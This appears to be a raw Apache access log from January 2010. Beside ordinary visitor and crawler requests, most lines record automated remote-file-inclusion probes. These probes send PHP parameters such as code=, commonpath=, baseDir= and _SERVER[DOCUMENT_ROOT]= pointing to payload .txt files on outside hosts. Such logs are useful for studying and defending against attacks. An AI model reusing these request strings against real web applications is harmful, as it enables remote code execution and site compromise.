216.7.173.20 - - [17/Jan/2010:01:20:30 -0500] "GET /logs/access_log.Q109100800//viewbody.html?code=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:01:20:39 -0500] "GET //common/db.php?commonpath=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:01:20:39 -0500] "GET /logs//common/db.php?commonpath=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:01:20:39 -0500] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:01:20:44 -0500] "GET /logs/access_log.Q109092400//common/db.php?commonpath=http://www.johngarzon.com.co/list/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:01:20:46 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.17.199.105 - - [17/Jan/2010:01:20:47 -0500] "GET //viewbody.html?code=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:01:20:47 -0500] "GET /logs//viewbody.html?code=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:01:20:48 -0500] "GET //viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:01:20:48 -0500] "GET /logs//viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:01:20:48 -0500] "GET /logs/error_log.Q109100800//viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:01:20:48 -0500] "GET /logs/access_log.Q109100800//viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:01:20:48 -0500] "GET /logs/access_log.Q109100800//viewbody.html?code=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:01:20:54 -0500] "GET /logs/error_log.Q109100800%20%20//viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.172.33.230 - - [17/Jan/2010:01:20:58 -0500] "GET /logs/error_log.Q109111200%20%20//viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
77.79.246.80 - - [17/Jan/2010:01:21:45 -0500] "GET //viewbody.html?code=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.79.246.80 - - [17/Jan/2010:01:21:45 -0500] "GET /logs//viewbody.html?code=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
77.79.246.80 - - [17/Jan/2010:01:21:45 -0500] "GET /logs/access_log.Q109100800//viewbody.html?code=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:01:24:11 -0500] "GET /logs/error_log.Q109111200%20%20//viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
85.17.199.105 - - [17/Jan/2010:01:24:11 -0500] "GET /logs/error_log.Q109100800%20%20//viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.232.142.64 - - [17/Jan/2010:01:26:20 -0500] "GET /logs//bbs//delete_all.php?board_skin_path=http://daegwallyeong.kma.go.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.232.142.64 - - [17/Jan/2010:01:26:20 -0500] "GET /logs/access_log.Q109093000//bbs//delete_all.php?board_skin_path=http://daegwallyeong.kma.go.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.232.142.64 - - [17/Jan/2010:01:26:20 -0500] "GET //bbs//delete_all.php?board_skin_path=http://daegwallyeong.kma.go.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
66.232.142.64 - - [17/Jan/2010:01:26:28 -0500] "GET /logs//bbs//delete_all.php?board_skin_path=http://daegwallyeong.kma.go.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.232.142.64 - - [17/Jan/2010:01:26:28 -0500] "GET //bbs//delete_all.php?board_skin_path=http://daegwallyeong.kma.go.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
66.232.142.64 - - [17/Jan/2010:01:26:28 -0500] "GET /logs/access_log.Q109093000//bbs//delete_all.php?board_skin_path=http://daegwallyeong.kma.go.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.232.142.64 - - [17/Jan/2010:01:26:31 -0500] "GET /logs/access_log.Q109110200//bbs//delete_all.php?board_skin_path=http://daegwallyeong.kma.go.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.232.142.64 - - [17/Jan/2010:01:26:33 -0500] "GET /logs/access_log.Q109110200//bbs//delete_all.php?board_skin_path=http://daegwallyeong.kma.go.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
212.175.5.130 - - [17/Jan/2010:01:26:33 -0500] "GET //%22pg%22zboard=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
67.195.37.174 - - [17/Jan/2010:01:28:30 -0500] "GET /logs/error_log.Q109070700 HTTP/1.0" 200 2847307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:01:28:33 -0500] "GET /logs/error_log.Q109070700 HTTP/1.0" 200 2847307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
75.33.200.231 - - [17/Jan/2010:01:29:07 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; GTB5; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.33.200.231 - - [17/Jan/2010:01:29:07 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; GTB5; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.33.200.231 - - [17/Jan/2010:01:29:08 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; GTB5; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
75.33.200.231 - - [17/Jan/2010:01:29:08 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; GTB5; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
201.38.203.3 - - [17/Jan/2010:01:29:13 -0500] "GET /logs/error_log.Q109111200%20//viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/yes.txt??? HTTP/1.1" 404 239 "-" "libwww-perl/5.803"
201.38.203.3 - - [17/Jan/2010:01:29:13 -0500] "GET //viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/yes.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
201.38.203.3 - - [17/Jan/2010:01:29:13 -0500] "GET /logs//viewbody.html?code=http://downloadgogo.com/osCommerce/catalog/images/yes.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
212.175.5.130 - - [17/Jan/2010:01:29:57 -0500] "GET /logs/error_log.Q110010300//%22pg%22zboard=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
212.175.5.130 - - [17/Jan/2010:01:29:58 -0500] "GET //%22pg%22zboard=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
212.175.5.130 - - [17/Jan/2010:01:29:58 -0500] "GET /logs//%22pg%22zboard=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
212.175.5.130 - - [17/Jan/2010:01:29:59 -0500] "GET /logs/error_log.Q110010300//%22pg%22zboard=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 297 "-" "libwww-perl/5.805"
212.175.5.130 - - [17/Jan/2010:01:30:00 -0500] "GET //%22pg%22zboard=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
212.175.5.130 - - [17/Jan/2010:01:30:00 -0500] "GET /logs//%22pg%22zboard=http://www.dwno.or.kr//bbs/data/wiwon02/xerxers.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
199.71.213.177 - - [17/Jan/2010:01:30:12 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:12 -0500] "GET /logs/access_log.Q109110600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:12 -0500] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:12 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:12 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:12 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:15 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:17 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:38 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:38 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:38 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:30:38 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:01:31:02 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.142 - - [17/Jan/2010:01:31:07 -0500] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L016A1B5D68E28200432D038+WSEQ(S0060):1+OUITEM(A0200):45415001 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
119.64.55.56 - - [17/Jan/2010:01:32:24 -0500] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 1.1.4322)"
119.64.55.56 - - [17/Jan/2010:01:32:24 -0500] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 1.1.4322)"
119.64.55.56 - - [17/Jan/2010:01:32:26 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 1.1.4322)"
119.64.55.56 - - [17/Jan/2010:01:32:26 -0500] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.3; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 1.1.4322)"
118.129.166.216 - - [17/Jan/2010:01:32:36 -0500] "GET //galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:32:36 -0500] "GET /logs/access_log.Q109102900//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:32:36 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:32:36 -0500] "GET /logs/error_log.Q109102900//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:33:12 -0500] "GET //galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:33:12 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:33:12 -0500] "GET /logs/error_log.Q109102900%20%20//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:33:13 -0500] "GET /logs/access_log.Q109102900%20%20//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:33:46 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:33:46 -0500] "GET //galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:33:46 -0500] "GET /logs/access_log.Q109060100//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:33:50 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:33:50 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:33:50 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:33:59 -0500] "GET /logs/access_log.Q109092900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:04 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:04 -0500] "GET /logs/error_log.Q109080300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:04 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:04 -0500] "GET /logs/error_log.Q109080300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:04 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:04 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
95.108.128.242 - - [17/Jan/2010:01:34:07 -0500] "GET /logs/access_log.Q109070500 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
85.18.127.213 - - [17/Jan/2010:01:34:28 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.18.127.213 - - [17/Jan/2010:01:34:28 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.18.127.213 - - [17/Jan/2010:01:34:28 -0500] "GET /logs/error_log.Q109080300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
85.18.127.213 - - [17/Jan/2010:01:34:30 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
85.18.127.213 - - [17/Jan/2010:01:34:30 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
85.18.127.213 - - [17/Jan/2010:01:34:30 -0500] "GET /logs/error_log.Q109080300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:34:33 -0500] "GET //galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:34:33 -0500] "GET /logs/access_log.Q109101500//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:34:33 -0500] "GET /logs//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:45 -0500] "GET /logs/error_log.Q109080300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:45 -0500] "GET /logs/access_log.Q109080300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:51 -0500] "GET /logs/access_log.Q109080300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.19.194.26 - - [17/Jan/2010:01:34:51 -0500] "GET /logs/error_log.Q109080300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.18.127.213 - - [17/Jan/2010:01:35:16 -0500] "GET /logs/access_log.Q109080300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.18.127.213 - - [17/Jan/2010:01:35:16 -0500] "GET /logs/error_log.Q109080300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
85.18.127.213 - - [17/Jan/2010:01:35:17 -0500] "GET /logs/access_log.Q109080300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
85.18.127.213 - - [17/Jan/2010:01:35:17 -0500] "GET /logs/error_log.Q109080300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://genesis.bajan.pl//photos/id1.txt?????? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
118.129.166.216 - - [17/Jan/2010:01:35:43 -0500] "GET /logs/error_log.Q109060100//galeria.php?start=0&kategoria=http://www.anginbali.com/mediagallery/mediaobjects/orig/f/1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:01:36:09 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.181.177.23 - - [17/Jan/2010:01:37:05 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7"
189.181.177.23 - - [17/Jan/2010:01:37:05 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7"
189.181.177.23 - - [17/Jan/2010:01:37:09 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7"
189.181.177.23 - - [17/Jan/2010:01:37:09 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7"
66.249.68.142 - - [17/Jan/2010:01:38:48 -0500] "GET /images/7473000_thumb.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
123.125.66.81 - - [17/Jan/2010:01:39:49 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [17/Jan/2010:01:41:19 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET /logs/access_log.Q109111200////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET /logs/access_log.Q109111200////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 200 34523 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET /logs/access_log.Q109111200%20%20////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 200 34523 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:53 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 200 34523 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:54 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
199.71.213.177 - - [17/Jan/2010:01:45:54 -0500] "GET /logs/access_log.Q109111200%20%20////?_SERVER[DOCUMENT_ROOT]=http://manormarketing.tv/id.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
